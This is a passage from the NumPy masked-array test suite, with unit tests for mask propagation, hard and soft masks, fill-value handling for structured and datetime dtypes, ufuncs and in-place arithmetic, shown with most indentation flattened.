assert_equal(np.add.reduce(x), add.reduce(x))
assert_equal(np.add.accumulate(x), add.accumulate(x))
assert_equal(4, sum(array(4), axis=0))
assert_equal(np.sum(x, axis=0), sum(x, axis=0))
assert_equal(np.sum(filled(xm, 0), axis=0), sum(xm, axis=0))
assert_equal(np.sum(x, 0), sum(x, 0))
assert_equal(np.product(x, axis=0), product(x, axis=0))
assert_equal(np.product(x, 0), product(x, 0))
assert_equal(np.product(filled(xm, 1), axis=0), product(xm, axis=0))
s = (3, 4)
x.shape = y.shape = xm.shape = ym.shape = s
if len(s) > 1:
assert_equal(np.concatenate((x, y), 1), concatenate((xm, ym), 1))
assert_equal(np.add.reduce(x, 1), add.reduce(x, 1))
assert_equal(np.sum(x, 1), sum(x, 1))
assert_equal(np.product(x, 1), product(x, 1))
def test_binops_d2D(self):
# Test binary operations on 2D data
a = array([[1.], [2.], [3.]], mask=[[False], [True], [True]])
b = array([[2., 3.], [4., 5.], [6., 7.]])
test = a * b
control = array([[2., 3.], [2., 2.], [3., 3.]],
mask=[[0, 0], [1, 1], [1, 1]])
assert_equal(test, control)
assert_equal(test.data, control.data)
assert_equal(test.mask, control.mask)
test = b * a
control = array([[2., 3.], [4., 5.], [6., 7.]],
mask=[[0, 0], [1, 1], [1, 1]])
assert_equal(test, control)
assert_equal(test.data, control.data)
assert_equal(test.mask, control.mask)
a = array([[1.], [2.], [3.]])
b = array([[2., 3.], [4., 5.], [6., 7.]],
mask=[[0, 0], [0, 0], [0, 1]])
test = a * b
control = array([[2, 3], [8, 10], [18, 3]],
mask=[[0, 0], [0, 0], [0, 1]])
assert_equal(test, control)
assert_equal(test.data, control.data)
assert_equal(test.mask, control.mask)
test = b * a
control = array([[2, 3], [8, 10], [18, 7]],
mask=[[0, 0], [0, 0], [0, 1]])
assert_equal(test, control)
assert_equal(test.data, control.data)
assert_equal(test.mask, control.mask)
def test_domained_binops_d2D(self):
# Test domained binary operations on 2D data
a = array([[1.], [2.], [3.]], mask=[[False], [True], [True]])
b = array([[2., 3.], [4., 5.], [6., 7.]])
test = a / b
control = array([[1. / 2., 1. / 3.], [2., 2.], [3., 3.]],
mask=[[0, 0], [1, 1], [1, 1]])
assert_equal(test, control)
assert_equal(test.data, control.data)
assert_equal(test.mask, control.mask)
test = b / a
control = array([[2. / 1., 3. / 1.], [4., 5.], [6., 7.]],
mask=[[0, 0], [1, 1], [1, 1]])
assert_equal(test, control)
assert_equal(test.data, control.data)
assert_equal(test.mask, control.mask)
a = array([[1.], [2.], [3.]])
b = array([[2., 3.], [4., 5.], [6., 7.]],
mask=[[0, 0], [0, 0], [0, 1]])
test = a / b
control = array([[1. / 2, 1. / 3], [2. / 4, 2. / 5], [3. / 6, 3]],
mask=[[0, 0], [0, 0], [0, 1]])
assert_equal(test, control)
assert_equal(test.data, control.data)
assert_equal(test.mask, control.mask)
test = b / a
control = array([[2 / 1., 3 / 1.], [4 / 2., 5 / 2.], [6 / 3., 7]],
mask=[[0, 0], [0, 0], [0, 1]])
assert_equal(test, control)
assert_equal(test.data, control.data)
assert_equal(test.mask, control.mask)
def test_noshrinking(self):
# Check that we don't shrink a mask when not wanted
# Binary operations
a = masked_array([1., 2., 3.], mask=[False, False, False],
shrink=False)
b = a + 1
assert_equal(b.mask, [0, 0, 0])
# In place binary operation
a += 1
assert_equal(a.mask, [0, 0, 0])
# Domained binary operation
b = a / 1.
assert_equal(b.mask, [0, 0, 0])
# In place binary operation
a /= 1.
assert_equal(a.mask, [0, 0, 0])
    def test_noshrink_on_creation(self):
# Check that the mask is not shrunk on array creation when not wanted
a = np.ma.masked_values([1., 2.5, 3.1], 1.5, shrink=False)
assert_equal(a.mask, [0, 0, 0])
def test_mod(self):
# Tests mod
(x, y, a10, m1, m2, xm, ym, z, zm, xf) = self.d
assert_equal(mod(x, y), mod(xm, ym))
test = mod(ym, xm)
assert_equal(test, np.mod(ym, xm))
assert_equal(test.mask, mask_or(xm.mask, ym.mask))
test = mod(xm, ym)
assert_equal(test, np.mod(xm, ym))
assert_equal(test.mask, mask_or(mask_or(xm.mask, ym.mask), (ym == 0)))
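        # mod() masks wherever the divisor is zero, on top of the union of
        # the input masks.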
def test_TakeTransposeInnerOuter(self):
# Test of take, transpose, inner, outer products
x = arange(24)
y = np.arange(24)
x[5:6] = masked
x = x.reshape(2, 3, 4)
y = y.reshape(2, 3, 4)
assert_equal(np.transpose(y, (2, 0, 1)), transpose(x, (2, 0, 1)))
assert_equal(np.take(y, (2, 0, 1), 1), take(x, (2, 0, 1), 1))
assert_equal(np.inner(filled(x, 0), filled(y, 0)),
inner(x, y))
assert_equal(np.outer(filled(x, 0), filled(y, 0)),
outer(x, y))
y = array(['abc', 1, 'def', 2, 3], object)
y[2] = masked
t = take(y, [0, 3, 4])
assert_(t[0] == 'abc')
assert_(t[1] == 2)
assert_(t[2] == 3)
def test_imag_real(self):
# Check complex
xx = array([1 + 10j, 20 + 2j], mask=[1, 0])
assert_equal(xx.imag, [10, 2])
assert_equal(xx.imag.filled(), [1e+20, 2])
assert_equal(xx.imag.dtype, xx._data.imag.dtype)
assert_equal(xx.real, [1, 20])
assert_equal(xx.real.filled(), [1e+20, 20])
assert_equal(xx.real.dtype, xx._data.real.dtype)
def test_methods_with_output(self):
xm = array(np.random.uniform(0, 10, 12)).reshape(3, 4)
xm[:, 0] = xm[0] = xm[-1, -1] = masked
funclist = ('sum', 'prod', 'var', 'std', 'max', 'min', 'ptp', 'mean',)
for funcname in funclist:
npfunc = getattr(np, funcname)
xmmeth = getattr(xm, funcname)
# A ndarray as explicit input
output = np.empty(4, dtype=float)
output.fill(-9999)
result = npfunc(xm, axis=0, out=output)
# ... the result should be the given output
assert_(result is output)
assert_equal(result, xmmeth(axis=0, out=output))
output = empty(4, dtype=int)
result = xmmeth(axis=0, out=output)
assert_(result is output)
assert_(output[0] is masked)
def test_eq_on_structured(self):
# Test the equality of structured arrays
ndtype = [('A', int), ('B', int)]
a = array([(1, 1), (2, 2)], mask=[(0, 1), (0, 0)], dtype=ndtype)
test = (a == a)
assert_equal(test, [True, True])
assert_equal(test.mask, [False, False])
b = array([(1, 1), (2, 2)], mask=[(1, 0), (0, 0)], dtype=ndtype)
test = (a == b)
assert_equal(test, [False, True])
assert_equal(test.mask, [True, False])
b = array([(1, 1), (2, 2)], mask=[(0, 1), (1, 0)], dtype=ndtype)
test = (a == b)
assert_equal(test, [True, False])
assert_equal(test.mask, [False, False])
def test_ne_on_structured(self):
# Test the equality of structured arrays
ndtype = [('A', int), ('B', int)]
a = array([(1, 1), (2, 2)], mask=[(0, 1), (0, 0)], dtype=ndtype)
test = (a != a)
assert_equal(test, [False, False])
assert_equal(test.mask, [False, False])
b = array([(1, 1), (2, 2)], mask=[(1, 0), (0, 0)], dtype=ndtype)
test = (a != b)
assert_equal(test, [True, False])
assert_equal(test.mask, [True, False])
b = array([(1, 1), (2, 2)], mask=[(0, 1), (1, 0)], dtype=ndtype)
test = (a != b)
assert_equal(test, [False, True])
assert_equal(test.mask, [False, False])
def test_eq_w_None(self):
# Really, comparisons with None should not be done, but check them
# anyway. Note that pep8 will flag these tests.
# With partial mask
a = array([1, 2], mask=[0, 1])
assert_equal(a == None, False)
assert_equal(a.data == None, False)
assert_equal(a.mask == None, False)
assert_equal(a != None, True)
# With nomask
a = array([1, 2], mask=False)
assert_equal(a == None, False)
assert_equal(a != None, True)
# With complete mask
a = array([1, 2], mask=True)
assert_equal(a == None, False)
assert_equal(a != None, True)
# Fully masked, even comparison to None should return "masked"
a = masked
assert_equal(a == None, masked)
def test_eq_w_scalar(self):
a = array(1)
assert_equal(a == 1, True)
assert_equal(a == 0, False)
assert_equal(a != 1, False)
assert_equal(a != 0, True)
def test_numpyarithmetics(self):
# Check that the mask is not back-propagated when using numpy functions
a = masked_array([-1, 0, 1, 2, 3], mask=[0, 0, 0, 0, 1])
control = masked_array([np.nan, np.nan, 0, np.log(2), -1],
mask=[1, 1, 0, 0, 1])
test = log(a)
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(a.mask, [0, 0, 0, 0, 1])
test = np.log(a)
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(a.mask, [0, 0, 0, 0, 1])
class TestMaskedArrayAttributes(TestCase):
def test_keepmask(self):
# Tests the keep mask flag
x = masked_array([1, 2, 3], mask=[1, 0, 0])
mx = masked_array(x)
assert_equal(mx.mask, x.mask)
mx = masked_array(x, mask=[0, 1, 0], keep_mask=False)
assert_equal(mx.mask, [0, 1, 0])
mx = masked_array(x, mask=[0, 1, 0], keep_mask=True)
assert_equal(mx.mask, [1, 1, 0])
        # keep_mask defaults to True
mx = masked_array(x, mask=[0, 1, 0])
assert_equal(mx.mask, [1, 1, 0])
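        # keep_mask=True ORs the new mask into x's existing mask instead of
        # replacing it.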
def test_hardmask(self):
# Test hard_mask
d = arange(5)
n = [0, 0, 0, 1, 1]
m = make_mask(n)
xh = array(d, mask=m, hard_mask=True)
        # We need to copy, to avoid updating d in xh!
xs = array(d, mask=m, hard_mask=False, copy=True)
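        # With a hard mask, assignments to masked slots are silently dropped;
        # with a soft mask they overwrite the data and clear the mask.
        # A minimal sketch (illustrative only, not part of the test):
        #   h = array([1, 2], mask=[1, 0], hard_mask=True)
        #   h[0] = 99           # dropped: slot 0 stays masked, data unchanged
        #   h.soften_mask()
        #   h[0] = 99           # now overwrites the data and clears the mask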
xh[[1, 4]] = [10, 40]
xs[[1, 4]] = [10, 40]
assert_equal(xh._data, [0, 10, 2, 3, 4])
assert_equal(xs._data, [0, 10, 2, 3, 40])
#assert_equal(xh.mask.ctypes._data, m.ctypes._data)
assert_equal(xs.mask, [0, 0, 0, 1, 0])
self.assertTrue(xh._hardmask)
self.assertTrue(not xs._hardmask)
xh[1:4] = [10, 20, 30]
xs[1:4] = [10, 20, 30]
assert_equal(xh._data, [0, 10, 20, 3, 4])
assert_equal(xs._data, [0, 10, 20, 30, 40])
#assert_equal(xh.mask.ctypes._data, m.ctypes._data)
assert_equal(xs.mask, nomask)
xh[0] = masked
xs[0] = masked
assert_equal(xh.mask, [1, 0, 0, 1, 1])
assert_equal(xs.mask, [1, 0, 0, 0, 0])
xh[:] = 1
xs[:] = 1
assert_equal(xh._data, [0, 1, 1, 3, 4])
assert_equal(xs._data, [1, 1, 1, 1, 1])
assert_equal(xh.mask, [1, 0, 0, 1, 1])
assert_equal(xs.mask, nomask)
# Switch to soft mask
xh.soften_mask()
xh[:] = arange(5)
assert_equal(xh._data, [0, 1, 2, 3, 4])
assert_equal(xh.mask, nomask)
# Switch back to hard mask
xh.harden_mask()
xh[xh < 3] = masked
assert_equal(xh._data, [0, 1, 2, 3, 4])
assert_equal(xh._mask, [1, 1, 1, 0, 0])
xh[filled(xh > 1, False)] = 5
assert_equal(xh._data, [0, 1, 2, 5, 5])
assert_equal(xh._mask, [1, 1, 1, 0, 0])
xh = array([[1, 2], [3, 4]], mask=[[1, 0], [0, 0]], hard_mask=True)
xh[0] = 0
assert_equal(xh._data, [[1, 0], [3, 4]])
assert_equal(xh._mask, [[1, 0], [0, 0]])
xh[-1, -1] = 5
assert_equal(xh._data, [[1, 0], [3, 5]])
assert_equal(xh._mask, [[1, 0], [0, 0]])
xh[filled(xh < 5, False)] = 2
assert_equal(xh._data, [[1, 2], [2, 5]])
assert_equal(xh._mask, [[1, 0], [0, 0]])
def test_hardmask_again(self):
# Another test of hardmask
d = arange(5)
n = [0, 0, 0, 1, 1]
m = make_mask(n)
xh = array(d, mask=m, hard_mask=True)
xh[4:5] = 999
#assert_equal(xh.mask.ctypes._data, m.ctypes._data)
xh[0:1] = 999
assert_equal(xh._data, [999, 1, 2, 3, 4])
def test_hardmask_oncemore_yay(self):
# OK, yet another test of hardmask
        # Make sure that harden_mask/soften_mask/unshare_mask return self
a = array([1, 2, 3], mask=[1, 0, 0])
b = a.harden_mask()
assert_equal(a, b)
b[0] = 0
assert_equal(a, b)
assert_equal(b, array([1, 2, 3], mask=[1, 0, 0]))
a = b.soften_mask()
a[0] = 0
assert_equal(a, b)
assert_equal(b, array([0, 2, 3], mask=[0, 0, 0]))
def test_smallmask(self):
# Checks the behaviour of _smallmask
a = arange(10)
a[1] = masked
a[1] = 1
assert_equal(a._mask, nomask)
a = arange(10)
a._smallmask = False
a[1] = masked
a[1] = 1
assert_equal(a._mask, zeros(10))
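        # _smallmask controls whether an all-False mask collapses back to
        # nomask; with it disabled, the full boolean mask is kept around.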
def test_shrink_mask(self):
# Tests .shrink_mask()
a = array([1, 2, 3], mask=[0, 0, 0])
b = a.shrink_mask()
assert_equal(a, b)
assert_equal(a.mask, nomask)
def test_flat(self):
# Test that flat can return all types of items [#4585, #4615]
# test simple access
test = masked_array(np.matrix([[1, 2, 3]]), mask=[0, 0, 1])
assert_equal(test.flat[1], 2)
assert_equal(test.flat[2], masked)
self.assertTrue(np.all(test.flat[0:2] == test[0, 0:2]))
        # Test flat on masked matrices
test = masked_array(np.matrix([[1, 2, 3]]), mask=[0, 0, 1])
test.flat = masked_array([3, 2, 1], mask=[1, 0, 0])
control = masked_array(np.matrix([[3, 2, 1]]), mask=[1, 0, 0])
assert_equal(test, control)
# Test setting
test = masked_array(np.matrix([[1, 2, 3]]), mask=[0, 0, 1])
testflat = test.flat
testflat[:] = testflat[[2, 1, 0]]
assert_equal(test, control)
testflat[0] = 9
assert_equal(test[0, 0], 9)
# test 2-D record array
# ... on structured array w/ masked records
x = array([[(1, 1.1, 'one'), (2, 2.2, 'two'), (3, 3.3, 'thr')],
[(4, 4.4, 'fou'), (5, 5.5, 'fiv'), (6, 6.6, 'six')]],
dtype=[('a', int), ('b', float), ('c', '|S8')])
x['a'][0, 1] = masked
x['b'][1, 0] = masked
x['c'][0, 2] = masked
x[-1, -1] = masked
xflat = x.flat
assert_equal(xflat[0], x[0, 0])
assert_equal(xflat[1], x[0, 1])
assert_equal(xflat[2], x[0, 2])
assert_equal(xflat[:3], x[0])
assert_equal(xflat[3], x[1, 0])
assert_equal(xflat[4], x[1, 1])
assert_equal(xflat[5], x[1, 2])
assert_equal(xflat[3:], x[1])
assert_equal(xflat[-1], x[-1, -1])
i = 0
j = 0
for xf in xflat:
assert_equal(xf, x[j, i])
i += 1
if i >= x.shape[-1]:
i = 0
j += 1
# test that matrices keep the correct shape (#4615)
a = masked_array(np.matrix(np.eye(2)), mask=0)
b = a.flat
b01 = b[:2]
assert_equal(b01.data, array([[1., 0.]]))
assert_equal(b01.mask, array([[False, False]]))
def test_assign_dtype(self):
# check that the mask's dtype is updated when dtype is changed
a = np.zeros(4, dtype='f4,i4')
m = np.ma.array(a)
m.dtype = np.dtype('f4')
repr(m) # raises?
assert_equal(m.dtype, np.dtype('f4'))
        # check that dtype changes that change the shape of the mask too
        # much are not allowed
def assign():
m = np.ma.array(a)
m.dtype = np.dtype('f8')
assert_raises(ValueError, assign)
b = a.view(dtype='f4', type=np.ma.MaskedArray) # raises?
assert_equal(b.dtype, np.dtype('f4'))
# check that nomask is preserved
a = np.zeros(4, dtype='f4')
m = np.ma.array(a)
m.dtype = np.dtype('f4,i4')
assert_equal(m.dtype, np.dtype('f4,i4'))
assert_equal(m._mask, np.ma.nomask)
class TestFillingValues(TestCase):
def test_check_on_scalar(self):
# Test _check_fill_value set to valid and invalid values
_check_fill_value = np.ma.core._check_fill_value
fval = _check_fill_value(0, int)
assert_equal(fval, 0)
fval = _check_fill_value(None, int)
assert_equal(fval, default_fill_value(0))
fval = _check_fill_value(0, "|S3")
assert_equal(fval, asbytes("0"))
fval = _check_fill_value(None, "|S3")
assert_equal(fval, default_fill_value(b"camelot!"))
self.assertRaises(TypeError, _check_fill_value, 1e+20, int)
self.assertRaises(TypeError, _check_fill_value, 'stuff', int)
def test_check_on_fields(self):
# Tests _check_fill_value with records
_check_fill_value = np.ma.core._check_fill_value
ndtype = [('a', int), ('b', float), ('c', "|S3")]
# A check on a list should return a single record
fval = _check_fill_value([-999, -12345678.9, "???"], ndtype)
self.assertTrue(isinstance(fval, ndarray))
assert_equal(fval.item(), [-999, -12345678.9, asbytes("???")])
# A check on None should output the defaults
fval = _check_fill_value(None, ndtype)
self.assertTrue(isinstance(fval, ndarray))
assert_equal(fval.item(), [default_fill_value(0),
default_fill_value(0.),
asbytes(default_fill_value("0"))])
#.....Using a structured type as fill_value should work
fill_val = np.array((-999, -12345678.9, "???"), dtype=ndtype)
fval = _check_fill_value(fill_val, ndtype)
self.assertTrue(isinstance(fval, ndarray))
assert_equal(fval.item(), [-999, -12345678.9, asbytes("???")])
#.....Using a flexible type w/ a different type shouldn't matter
# BEHAVIOR in 1.5 and earlier: match structured types by position
#fill_val = np.array((-999, -12345678.9, "???"),
# dtype=[("A", int), ("B", float), ("C", "|S3")])
# BEHAVIOR in 1.6 and later: match structured types by name
fill_val = np.array(("???", -999, -12345678.9),
dtype=[("c", "|S3"), ("a", int), ("b", float), ])
fval = _check_fill_value(fill_val, ndtype)
self.assertTrue(isinstance(fval, ndarray))
assert_equal(fval.item(), [-999, -12345678.9, asbytes("???")])
#.....Using an object-array shouldn't matter either
fill_val = np.ndarray(shape=(1,), dtype=object)
fill_val[0] = (-999, -12345678.9, asbytes("???"))
fval = _check_fill_value(fill_val, object)
self.assertTrue(isinstance(fval, ndarray))
assert_equal(fval.item(), [-999, -12345678.9, asbytes("???")])
# NOTE: This test was never run properly as "fill_value" rather than
# "fill_val" was assigned. Written properly, it fails.
#fill_val = np.array((-999, -12345678.9, "???"))
#fval = _check_fill_value(fill_val, ndtype)
#self.assertTrue(isinstance(fval, ndarray))
#assert_equal(fval.item(), [-999, -12345678.9, asbytes("???")])
#.....One-field-only flexible type should work as well
ndtype = [("a", int)]
fval = _check_fill_value(-999999999, ndtype)
self.assertTrue(isinstance(fval, ndarray))
assert_equal(fval.item(), (-999999999,))
def test_fillvalue_conversion(self):
# Tests the behavior of fill_value during conversion
        # Attach a tailored comment to make sure special attributes
        # (_optinfo) are properly carried through the conversion
a = array(asbytes_nested(['3', '4', '5']))
a._optinfo.update({'comment':"updated!"})
b = array(a, dtype=int)
assert_equal(b._data, [3, 4, 5])
assert_equal(b.fill_value, default_fill_value(0))
b = array(a, dtype=float)
assert_equal(b._data, [3, 4, 5])
assert_equal(b.fill_value, default_fill_value(0.))
b = a.astype(int)
assert_equal(b._data, [3, 4, 5])
assert_equal(b.fill_value, default_fill_value(0))
assert_equal(b._optinfo['comment'], "updated!")
b = a.astype([('a', '|S3')])
assert_equal(b['a']._data, a._data)
assert_equal(b['a'].fill_value, a.fill_value)
def test_fillvalue(self):
# Yet more fun with the fill_value
data = masked_array([1, 2, 3], fill_value=-999)
series = data[[0, 2, 1]]
assert_equal(series._fill_value, data._fill_value)
mtype = [('f', float), ('s', '|S3')]
x = array([(1, 'a'), (2, 'b'), (pi, 'pi')], dtype=mtype)
x.fill_value = 999
assert_equal(x.fill_value.item(), [999., asbytes('999')])
assert_equal(x['f'].fill_value, 999)
assert_equal(x['s'].fill_value, asbytes('999'))
x.fill_value = (9, '???')
assert_equal(x.fill_value.item(), (9, asbytes('???')))
assert_equal(x['f'].fill_value, 9)
assert_equal(x['s'].fill_value, asbytes('???'))
x = array([1, 2, 3.1])
x.fill_value = 999
assert_equal(np.asarray(x.fill_value).dtype, float)
assert_equal(x.fill_value, 999.)
assert_equal(x._fill_value, np.array(999.))
def test_fillvalue_exotic_dtype(self):
# Tests yet more exotic flexible dtypes
_check_fill_value = np.ma.core._check_fill_value
ndtype = [('i', int), ('s', '|S8'), ('f', float)]
control = np.array((default_fill_value(0),
default_fill_value('0'),
default_fill_value(0.),),
dtype=ndtype)
assert_equal(_check_fill_value(None, ndtype), control)
# The shape shouldn't matter
ndtype = [('f0', float, (2, 2))]
control = np.array((default_fill_value(0.),),
dtype=[('f0', float)]).astype(ndtype)
assert_equal(_check_fill_value(None, ndtype), control)
control = np.array((0,), dtype=[('f0', float)]).astype(ndtype)
assert_equal(_check_fill_value(0, ndtype), control)
ndtype = np.dtype("int, (2,3)float, float")
control = np.array((default_fill_value(0),
default_fill_value(0.),
default_fill_value(0.),),
dtype="int, float, float").astype(ndtype)
test = _check_fill_value(None, ndtype)
assert_equal(test, control)
control = np.array((0, 0, 0), dtype="int, float, float").astype(ndtype)
assert_equal(_check_fill_value(0, ndtype), control)
def test_fillvalue_datetime_timedelta(self):
# Test default fillvalue for datetime64 and timedelta64 types.
# See issue #4476, this would return '?' which would cause errors
# elsewhere
for timecode in ("as", "fs", "ps", "ns", "us", "ms", "s", "m",
"h", "D", "W", "M", "Y"):
control = numpy.datetime64("NaT", timecode)
test = default_fill_value(numpy.dtype("<M8[" + timecode + "]"))
assert_equal(test, control)
control = numpy.timedelta64("NaT", timecode)
test = default_fill_value(numpy.dtype("<m8[" + timecode + "]"))
assert_equal(test, control)
def test_extremum_fill_value(self):
# Tests extremum fill values for flexible type.
a = array([(1, (2, 3)), (4, (5, 6))],
dtype=[('A', int), ('B', [('BA', int), ('BB', int)])])
test = a.fill_value
assert_equal(test['A'], default_fill_value(a['A']))
assert_equal(test['B']['BA'], default_fill_value(a['B']['BA']))
assert_equal(test['B']['BB'], default_fill_value(a['B']['BB']))
test = minimum_fill_value(a)
assert_equal(test[0], minimum_fill_value(a['A']))
assert_equal(test[1][0], minimum_fill_value(a['B']['BA']))
assert_equal(test[1][1], minimum_fill_value(a['B']['BB']))
assert_equal(test[1], minimum_fill_value(a['B']))
test = maximum_fill_value(a)
assert_equal(test[0], maximum_fill_value(a['A']))
assert_equal(test[1][0], maximum_fill_value(a['B']['BA']))
assert_equal(test[1][1], maximum_fill_value(a['B']['BB']))
assert_equal(test[1], maximum_fill_value(a['B']))
def test_fillvalue_individual_fields(self):
# Test setting fill_value on individual fields
ndtype = [('a', int), ('b', int)]
# Explicit fill_value
a = array(list(zip([1, 2, 3], [4, 5, 6])),
fill_value=(-999, -999), dtype=ndtype)
aa = a['a']
aa.set_fill_value(10)
assert_equal(aa._fill_value, np.array(10))
assert_equal(tuple(a.fill_value), (10, -999))
a.fill_value['b'] = -10
assert_equal(tuple(a.fill_value), (10, -10))
# Implicit fill_value
t = array(list(zip([1, 2, 3], [4, 5, 6])), dtype=ndtype)
tt = t['a']
tt.set_fill_value(10)
assert_equal(tt._fill_value, np.array(10))
assert_equal(tuple(t.fill_value), (10, default_fill_value(0)))
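        # A field view shares the parent's fill_value record, so setting the
        # fill_value on the view updates the corresponding field of the
        # parent.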
def test_fillvalue_implicit_structured_array(self):
# Check that fill_value is always defined for structured arrays
ndtype = ('b', float)
adtype = ('a', float)
a = array([(1.,), (2.,)], mask=[(False,), (False,)],
fill_value=(np.nan,), dtype=np.dtype([adtype]))
b = empty(a.shape, dtype=[adtype, ndtype])
b['a'] = a['a']
b['a'].set_fill_value(a['a'].fill_value)
f = b._fill_value[()]
assert_(np.isnan(f[0]))
assert_equal(f[-1], default_fill_value(1.))
def test_fillvalue_as_arguments(self):
# Test adding a fill_value parameter to empty/ones/zeros
a = empty(3, fill_value=999.)
assert_equal(a.fill_value, 999.)
a = ones(3, fill_value=999., dtype=float)
assert_equal(a.fill_value, 999.)
a = zeros(3, fill_value=0., dtype=complex)
assert_equal(a.fill_value, 0.)
a = identity(3, fill_value=0., dtype=complex)
assert_equal(a.fill_value, 0.)
def test_shape_argument(self):
        # Test that shape can be provided as an argument
# GH issue 6106
a = empty(shape=(3, ))
assert_equal(a.shape, (3, ))
a = ones(shape=(3, ), dtype=float)
assert_equal(a.shape, (3, ))
a = zeros(shape=(3, ), dtype=complex)
assert_equal(a.shape, (3, ))
def test_fillvalue_in_view(self):
# Test the behavior of fill_value in view
# Create initial masked array
x = array([1, 2, 3], fill_value=1, dtype=np.int64)
# Check that fill_value is preserved by default
y = x.view()
assert_(y.fill_value == 1)
# Check that fill_value is preserved if dtype is specified and the
# dtype is an ndarray sub-class and has a _fill_value attribute
y = x.view(MaskedArray)
assert_(y.fill_value == 1)
        # Check that fill_value is preserved if type is specified and the
        # dtype is an ndarray sub-class and has a _fill_value attribute (by
        # default, the first argument is dtype, not type)
y = x.view(type=MaskedArray)
assert_(y.fill_value == 1)
# Check that code does not crash if passed an ndarray sub-class that
# does not have a _fill_value attribute
y = x.view(np.ndarray)
y = x.view(type=np.ndarray)
        # Check that fill_value can be overridden with view
y = x.view(MaskedArray, fill_value=2)
assert_(y.fill_value == 2)
        # Check that fill_value can be overridden with view (using type=)
y = x.view(type=MaskedArray, fill_value=2)
assert_(y.fill_value == 2)
# Check that fill_value gets reset if passed a dtype but not a
# fill_value. This is because even though in some cases one can safely
# cast the fill_value, e.g. if taking an int64 view of an int32 array,
# in other cases, this cannot be done (e.g. int32 view of an int64
# array with a large fill_value).
y = x.view(dtype=np.int32)
assert_(y.fill_value == 999999)
class TestUfuncs(TestCase):
# Test class for the application of ufuncs on MaskedArrays.
def setUp(self):
# Base data definition.
self.d = (array([1.0, 0, -1, pi / 2] * 2, mask=[0, 1] + [0] * 6),
array([1.0, 0, -1, pi / 2] * 2, mask=[1, 0] + [0] * 6),)
self.err_status = np.geterr()
np.seterr(divide='ignore', invalid='ignore')
def tearDown(self):
np.seterr(**self.err_status)
def test_testUfuncRegression(self):
# Tests new ufuncs on MaskedArrays.
for f in ['sqrt', 'log', 'log10', 'exp', 'conjugate',
'sin', 'cos', 'tan',
'arcsin', 'arccos', 'arctan',
'sinh', 'cosh', 'tanh',
'arcsinh',
'arccosh',
'arctanh',
'absolute', 'fabs', 'negative',
# 'nonzero', 'around',
'floor', 'ceil',
# 'sometrue', 'alltrue',
'logical_not',
'add', 'subtract', 'multiply',
'divide', 'true_divide', 'floor_divide',
'remainder', 'fmod', 'hypot', 'arctan2',
'equal', 'not_equal', 'less_equal', 'greater_equal',
'less', 'greater',
'logical_and', 'logical_or', 'logical_xor',
]:
try:
uf = getattr(umath, f)
except AttributeError:
uf = getattr(fromnumeric, f)
mf = getattr(numpy.ma.core, f)
args = self.d[:uf.nin]
ur = uf(*args)
mr = mf(*args)
assert_equal(ur.filled(0), mr.filled(0), f)
assert_mask_equal(ur.mask, mr.mask, err_msg=f)
def test_reduce(self):
# Tests reduce on MaskedArrays.
a = self.d[0]
self.assertTrue(not alltrue(a, axis=0))
self.assertTrue(sometrue(a, axis=0))
assert_equal(sum(a[:3], axis=0), 0)
assert_equal(product(a, axis=0), 0)
assert_equal(add.reduce(a), pi)
def test_minmax(self):
# Tests extrema on MaskedArrays.
a = arange(1, 13).reshape(3, 4)
amask = masked_where(a < 5, a)
assert_equal(amask.max(), a.max())
assert_equal(amask.min(), 5)
assert_equal(amask.max(0), a.max(0))
assert_equal(amask.min(0), [5, 6, 7, 8])
self.assertTrue(amask.max(1)[0].mask)
self.assertTrue(amask.min(1)[0].mask)
def test_ndarray_mask(self):
        # Check that the mask of the result is an ndarray (not a MaskedArray...)
a = masked_array([-1, 0, 1, 2, 3], mask=[0, 0, 0, 0, 1])
test = np.sqrt(a)
control = masked_array([-1, 0, 1, np.sqrt(2), -1],
mask=[1, 0, 0, 0, 1])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
self.assertTrue(not isinstance(test.mask, MaskedArray))
def test_treatment_of_NotImplemented(self):
# Check that NotImplemented is returned at appropriate places
a = masked_array([1., 2.], mask=[1, 0])
self.assertRaises(TypeError, operator.mul, a, "abc")
self.assertRaises(TypeError, operator.truediv, a, "abc")
class MyClass(object):
__array_priority__ = a.__array_priority__ + 1
def __mul__(self, other):
return "My mul"
def __rmul__(self, other):
return "My rmul"
me = MyClass()
assert_(me * a == "My mul")
assert_(a * me == "My rmul")
# and that __array_priority__ is respected
class MyClass2(object):
__array_priority__ = 100
def __mul__(self, other):
return "Me2mul"
def __rmul__(self, other):
return "Me2rmul"
def __rdiv__(self, other):
return "Me2rdiv"
__rtruediv__ = __rdiv__
me_too = MyClass2()
assert_(a.__mul__(me_too) is NotImplemented)
assert_(all(multiply.outer(a, me_too) == "Me2rmul"))
assert_(a.__truediv__(me_too) is NotImplemented)
assert_(me_too * a == "Me2mul")
assert_(a * me_too == "Me2rmul")
assert_(a / me_too == "Me2rdiv")
class TestMaskedArrayInPlaceArithmetics(TestCase):
    # Test MaskedArray in-place arithmetic
def setUp(self):
x = arange(10)
y = arange(10)
xm = arange(10)
xm[2] = masked
self.intdata = (x, y, xm)
self.floatdata = (x.astype(float), y.astype(float), xm.astype(float))
self.othertypes = np.typecodes['AllInteger'] + np.typecodes['AllFloat']
self.othertypes = [np.dtype(_).type for _ in self.othertypes]
self.uint8data = (
x.astype(np.uint8),
y.astype(np.uint8),
xm.astype(np.uint8)
)
def test_inplace_addition_scalar(self):
# Test of inplace additions
(x, y, xm) = self.intdata
xm[2] = masked
x += 1
assert_equal(x, y + 1)
xm += 1
assert_equal(xm, y + 1)
(x, _, xm) = self.floatdata
id1 = x.data.ctypes._data
x += 1.
assert_(id1 == x.data.ctypes._data)
assert_equal(x, y + 1.)
def test_inplace_addition_array(self):
# Test of inplace additions
(x, y, xm) = self.intdata
m = xm.mask
a = arange(10, dtype=np.int16)
a[-1] = masked
x += a
xm += a
assert_equal(x, y + a)
assert_equal(xm, y + a)
assert_equal(xm.mask, mask_or(m, a.mask))
def test_inplace_subtraction_scalar(self):
# Test of inplace subtractions
(x, y, xm) = self.intdata
x -= 1
assert_equal(x, y - 1)
xm -= 1
assert_equal(xm, y - 1)
def test_inplace_subtraction_array(self):
# Test of inplace subtractions
(x, y, xm) = self.floatdata
m = xm.mask
a = arange(10, dtype=float)
a[-1] = masked
x -= a
xm -= a
assert_equal(x, y - a)
assert_equal(xm, y - a)
assert_equal(xm.mask, mask_or(m, a.mask))
def test_inplace_multiplication_scalar(self):
# Test of inplace multiplication
(x, y, xm) = self.floatdata
x *= 2.0
